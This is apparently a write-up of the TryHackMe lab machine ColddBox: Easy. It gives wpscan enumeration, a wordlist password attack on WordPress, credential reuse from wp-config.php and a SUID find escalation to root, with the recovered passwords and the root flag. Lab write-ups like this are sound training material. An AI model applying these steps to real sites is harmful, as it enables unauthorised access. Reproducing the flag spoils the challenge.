THM: ColddBox: Easy
Jacob the Boss
An easy level machine with multiple ways to escalate privileges.
This is ColddBox from THM.
Ports
HTTP on port 80 and SSH hiding away on port 4512. We won’t need it anyway.
HTTP
What’s that - did someone say Wordpress?
root@kali:/opt/tryhackme/colddbox# wpscan -e --url http://10.10.0.137
Gets 3 users; let’s run a password attack:
root@kali:/opt/tryhackme/colddbox# wpscan -U 'hugo,c0ldd,philip' -P /usr/share/wordlists/rockyou.txt --url http://10.10.0.137
[+] Performing password attack on Wp Login against 3 user/s
[SUCCESS] - c0ldd / 9876543210 Bingo. From there, it’s upload a plugin and get a shell.
c0ldd
This is our user; we can find the database password:
[+] Searching Wordpress wp-config.php files
wp-config.php files found: /var/www/html/wp-config.phpdefine('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost'); This is also the user password for c0ldd, so let’s run sudo -l:
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftpWow, we do have a few methods we can practice if we want. But let’s not; find has the SUID bit set as well:
c0ldd@ColddBox-Easy:~$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -lash
ls -lash
total 32K
4,0K drwx------ 4 root root 4,0K sep 24 18:52 .
4,0K drwxr-xr-x 23 root root 4,0K sep 24 16:47 ..
4,0K -rw------- 1 root root 10 oct 19 18:53 .bash_history
0 -rw-r--r-- 1 root root 0 oct 14 13:28 .bashrc
4,0K drwx------ 2 root root 4,0K sep 24 18:52 .cache
4,0K -rw------- 1 root root 220 sep 24 17:02 .mysql_history
4,0K drwxr-xr-x 2 root root 4,0K sep 24 16:54 .nano
4,0K -rw-r--r-- 1 root root 148 ago 17 2015 .profile
4,0K -rw-r--r-- 1 root root 49 sep 24 18:23 root.txt
# cat root.txt
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=Okey dokey. I’ve also got user on HTB Ready; I haven’t been on HTB for quite a while before now. I’m not allowed to write it up anyway.